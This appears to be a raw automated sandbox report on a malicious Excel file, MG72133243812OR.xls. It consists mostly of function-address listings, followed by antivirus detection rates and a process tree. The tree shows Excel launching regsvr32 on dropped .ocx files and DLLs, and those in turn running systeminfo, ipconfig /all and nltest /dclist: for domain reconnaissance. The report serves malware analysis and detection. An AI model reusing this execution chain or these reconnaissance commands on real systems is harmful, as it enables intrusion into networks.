Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180003C20 8_2_0000000180003C20
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001A228 8_2_000000018001A228
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001C230 8_2_000000018001C230
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180009230 8_2_0000000180009230
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180016238 8_2_0000000180016238
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000F038 8_2_000000018000F038
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001A83C 8_2_000000018001A83C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000383C 8_2_000000018000383C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180006C40 8_2_0000000180006C40
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180003248 8_2_0000000180003248
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180017E54 8_2_0000000180017E54
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000E254 8_2_000000018000E254
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180004E58 8_2_0000000180004E58
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180016C60 8_2_0000000180016C60
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018002446C 8_2_000000018002446C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180017870 8_2_0000000180017870
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180023078 8_2_0000000180023078
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000B078 8_2_000000018000B078
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018002087C 8_2_000000018002087C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000FC84 8_2_000000018000FC84
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180001A88 8_2_0000000180001A88
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001AA8C 8_2_000000018001AA8C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001828C 8_2_000000018001828C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000248C 8_2_000000018000248C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180023698 8_2_0000000180023698
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180026098 8_2_0000000180026098
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001529C 8_2_000000018001529C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000229C 8_2_000000018000229C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000409C 8_2_000000018000409C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800142A0 8_2_00000001800142A0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180022AA4 8_2_0000000180022AA4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800180A4 8_2_00000001800180A4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180020EAB 8_2_0000000180020EAB
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001A6B8 8_2_000000018001A6B8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001B6C0 8_2_000000018001B6C0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800154C4 8_2_00000001800154C4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000AACC 8_2_000000018000AACC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000F8D0 8_2_000000018000F8D0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800048D4 8_2_00000001800048D4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180001CD8 8_2_0000000180001CD8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800202E8 8_2_00000001800202E8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180002EE8 8_2_0000000180002EE8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000DEF0 8_2_000000018000DEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800248F8 8_2_00000001800248F8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800170FC 8_2_00000001800170FC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180021F04 8_2_0000000180021F04
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001F108 8_2_000000018001F108
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180021B0C 8_2_0000000180021B0C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180014D10 8_2_0000000180014D10
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180001910 8_2_0000000180001910
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000B714 8_2_000000018000B714
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180005914 8_2_0000000180005914
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180019D18 8_2_0000000180019D18
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180021528 8_2_0000000180021528
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001F528 8_2_000000018001F528
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000E538 8_2_000000018000E538
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000433C 8_2_000000018000433C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180007D3C 8_2_0000000180007D3C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000A73C 8_2_000000018000A73C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000AD48 8_2_000000018000AD48
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180013F50 8_2_0000000180013F50
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180023D54 8_2_0000000180023D54
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001B95C 8_2_000000018001B95C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001775C 8_2_000000018001775C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180026D60 8_2_0000000180026D60
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001E964 8_2_000000018001E964
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180008564 8_2_0000000180008564
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180017368 8_2_0000000180017368
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180004B78 8_2_0000000180004B78
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000DD78 8_2_000000018000DD78
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180020D7C 8_2_0000000180020D7C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001FB7C 8_2_000000018001FB7C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000E37C 8_2_000000018000E37C
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180024180 8_2_0000000180024180
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000BF84 8_2_000000018000BF84
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180018788 8_2_0000000180018788
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001F794 8_2_000000018001F794
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800271A0 8_2_00000001800271A0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800231A4 8_2_00000001800231A4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001EFA4 8_2_000000018001EFA4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180011DA8 8_2_0000000180011DA8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180002FA8 8_2_0000000180002FA8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000F7A8 8_2_000000018000F7A8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180024BAC 8_2_0000000180024BAC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800111AC 8_2_00000001800111AC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000CDB0 8_2_000000018000CDB0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180024DB4 8_2_0000000180024DB4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800123B4 8_2_00000001800123B4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001AFB8 8_2_000000018001AFB8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800245C4 8_2_00000001800245C4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001CBC4 8_2_000000018001CBC4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180022BD0 8_2_0000000180022BD0
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800039D4 8_2_00000001800039D4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018000FDD4 8_2_000000018000FDD4
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_000000018001C9D8 8_2_000000018001C9D8
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800025DC 8_2_00000001800025DC
Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800027E0 8_2_00000001800027E0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74D9C10 9_2_000007FEF74D9C10
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74D5F90 9_2_000007FEF74D5F90
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74ED000 9_2_000007FEF74ED000
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF750902C 9_2_000007FEF750902C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74E1FD8 9_2_000007FEF74E1FD8
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74F1FE8 9_2_000007FEF74F1FE8
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74EEE90 9_2_000007FEF74EEE90
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF7519F18 9_2_000007FEF7519F18
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74F6EDC 9_2_000007FEF74F6EDC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74F2EC0 9_2_000007FEF74F2EC0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74ECEE4 9_2_000007FEF74ECEE4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74EFEF0 9_2_000007FEF74EFEF0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF750BB54 9_2_000007FEF750BB54
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF7514D7C 9_2_000007FEF7514D7C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF750FE3C 9_2_000007FEF750FE3C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74ECDDC 9_2_000007FEF74ECDDC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74D3C90 9_2_000007FEF74D3C90
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74EECA4 9_2_000007FEF74EECA4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74F7C74 9_2_000007FEF74F7C74
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74EFD04 9_2_000007FEF74EFD04
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74ECCC4 9_2_000007FEF74ECCC4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74EDBA8 9_2_000007FEF74EDBA8
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74ECBA4 9_2_000007FEF74ECBA4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF750BB54 9_2_000007FEF750BB54
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF7511BE8 9_2_000007FEF7511BE8
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74ECA9C 9_2_000007FEF74ECA9C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74EDAA0 9_2_000007FEF74EDAA0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74EEA78 9_2_000007FEF74EEA78
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74F6B10 9_2_000007FEF74F6B10
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74F2B30 9_2_000007FEF74F2B30
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74F4ADC 9_2_000007FEF74F4ADC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74EFAD8 9_2_000007FEF74EFAD8
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74EC980 9_2_000007FEF74EC980
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74ED998 9_2_000007FEF74ED998
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74F4988 9_2_000007FEF74F4988
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF750E608 9_2_000007FEF750E608
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF7516A20 9_2_000007FEF7516A20
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74EE890 9_2_000007FEF74EE890
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74ED890 9_2_000007FEF74ED890
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74D68B0 9_2_000007FEF74D68B0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74EC878 9_2_000007FEF74EC878
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF75088CC 9_2_000007FEF75088CC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74EF8F0 9_2_000007FEF74EF8F0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF751B790 9_2_000007FEF751B790
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74F7790 9_2_000007FEF74F7790
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74F27A4 9_2_000007FEF74F27A4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74EC758 9_2_000007FEF74EC758
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74D4770 9_2_000007FEF74D4770
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74ED770 9_2_000007FEF74ED770
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74D37C0 9_2_000007FEF74D37C0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74EC650 9_2_000007FEF74EC650
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74ED668 9_2_000007FEF74ED668
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF7520724 9_2_000007FEF7520724
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74EF6C0 9_2_000007FEF74EF6C0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74F66C4 9_2_000007FEF74F66C4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF75025B8 9_2_000007FEF75025B8
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF75105AC 9_2_000007FEF75105AC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74ED54C 9_2_000007FEF74ED54C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF7516570 9_2_000007FEF7516570
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF750E608 9_2_000007FEF750E608
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF75045F4 9_2_000007FEF75045F4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74ED444 9_2_000007FEF74ED444
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74EF4D4 9_2_000007FEF74EF4D4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74D63B0 9_2_000007FEF74D63B0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74D5340 9_2_000007FEF74D5340
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74F237C 9_2_000007FEF74F237C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF750841C 9_2_000007FEF750841C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74F6290 9_2_000007FEF74F6290
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74EF2A8 9_2_000007FEF74EF2A8
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF750C310 9_2_000007FEF750C310
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74ED328 9_2_000007FEF74ED328
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74F72C0 9_2_000007FEF74F72C0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74F32CC 9_2_000007FEF74F32CC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF751717C 9_2_000007FEF751717C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74ED224 9_2_000007FEF74ED224
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF7516040 9_2_000007FEF7516040
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74ED108 9_2_000007FEF74ED108
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74F80D0 9_2_000007FEF74F80D0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000007FEF74EF0C0 9_2_000007FEF74EF0C0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_001B0000 9_2_001B0000
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001409C 9_2_000000018001409C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000BA00 9_2_000000018000BA00
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180013320 9_2_0000000180013320
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180017368 9_2_0000000180017368
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001A38C 9_2_000000018001A38C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180015C94 9_2_0000000180015C94
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000CDB0 9_2_000000018000CDB0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800125B4 9_2_00000001800125B4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180017E54 9_2_0000000180017E54
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180007E74 9_2_0000000180007E74
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800217E4 9_2_00000001800217E4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800147EC 9_2_00000001800147EC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000F038 9_2_000000018000F038
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001A83C 9_2_000000018001A83C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000383C 9_2_000000018000383C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180017870 9_2_0000000180017870
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180023078 9_2_0000000180023078
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000B078 9_2_000000018000B078
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018002087C 9_2_000000018002087C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180026098 9_2_0000000180026098
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000409C 9_2_000000018000409C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800180A4 9_2_00000001800180A4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000F8D0 9_2_000000018000F8D0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800048D4 9_2_00000001800048D4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800248F8 9_2_00000001800248F8
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800170FC 9_2_00000001800170FC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001F108 9_2_000000018001F108
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180001910 9_2_0000000180001910
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180005914 9_2_0000000180005914
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001B95C 9_2_000000018001B95C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001E964 9_2_000000018001E964
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180024180 9_2_0000000180024180
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800271A0 9_2_00000001800271A0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800231A4 9_2_00000001800231A4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800111AC 9_2_00000001800111AC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800039D4 9_2_00000001800039D4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001C9D8 9_2_000000018001C9D8
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800221FC 9_2_00000001800221FC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180001208 9_2_0000000180001208
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001A228 9_2_000000018001A228
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001C230 9_2_000000018001C230
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180009230 9_2_0000000180009230
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180016238 9_2_0000000180016238
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180003248 9_2_0000000180003248
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000E254 9_2_000000018000E254
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180001A88 9_2_0000000180001A88
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001AA8C 9_2_000000018001AA8C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001828C 9_2_000000018001828C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001529C 9_2_000000018001529C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000229C 9_2_000000018000229C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800142A0 9_2_00000001800142A0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180022AA4 9_2_0000000180022AA4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000AACC 9_2_000000018000AACC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800202E8 9_2_00000001800202E8
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180021B0C 9_2_0000000180021B0C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000433C 9_2_000000018000433C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000A368 9_2_000000018000A368
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180004B78 9_2_0000000180004B78
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001FB7C 9_2_000000018001FB7C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000E37C 9_2_000000018000E37C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180024BAC 9_2_0000000180024BAC
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800123B4 9_2_00000001800123B4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180007BB8 9_2_0000000180007BB8
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001CBC4 9_2_000000018001CBC4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180022BD0 9_2_0000000180022BD0
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180017C04 9_2_0000000180017C04
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180026410 9_2_0000000180026410
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001F414 9_2_000000018001F414
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180021418 9_2_0000000180021418
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180003C20 9_2_0000000180003C20
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180013C2C 9_2_0000000180013C2C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180006C40 9_2_0000000180006C40
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180008458 9_2_0000000180008458
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180016C60 9_2_0000000180016C60
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018002446C 9_2_000000018002446C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000FC84 9_2_000000018000FC84
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000248C 9_2_000000018000248C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_00000001800154C4 9_2_00000001800154C4
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180001CD8 9_2_0000000180001CD8
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180014D10 9_2_0000000180014D10
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180019D18 9_2_0000000180019D18
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180021528 9_2_0000000180021528
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018001F528 9_2_000000018001F528
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000E538 9_2_000000018000E538
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180007D3C 9_2_0000000180007D3C
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_000000018000AD48 9_2_000000018000AD48
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180023D54 9_2_0000000180023D54
Source: C:\Windows\System32\regsvr32.exe Code function: 9_2_0000000180026D60 9_2_0000000180026D60
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF7506320 appears 44 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF9131A70 appears 411 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF74D1A70 appears 411 times
Source: C:\Windows\System32\regsvr32.exe Code function: String function: 000007FEF9166320 appears 44 times
Source: MG72133243812OR.xls Macro extractor: Sheet name: IJEIGOPSAGHSPHP
Source: MG72133243812OR.xls Macro extractor: Sheet name: IJEIGOPSAGHSPHP
Source: MG72133243812OR.xls Virustotal: Detection: 63%
Source: MG72133243812OR.xls Metadefender: Detection: 40%
Source: MG72133243812OR.xls ReversingLabs: Detection: 51%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\hhwe1.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\hhwe2.ocx
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\hhwe3.ocx
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\OajQanYCSHcPg\quNy.dll"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\hhwe4.ocx
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\HUWZaq\zHqsrrqpZcTdGFR.dll"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\nltest.exe nltest /dclist:
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\hhwe1.ocx Jump to behavior
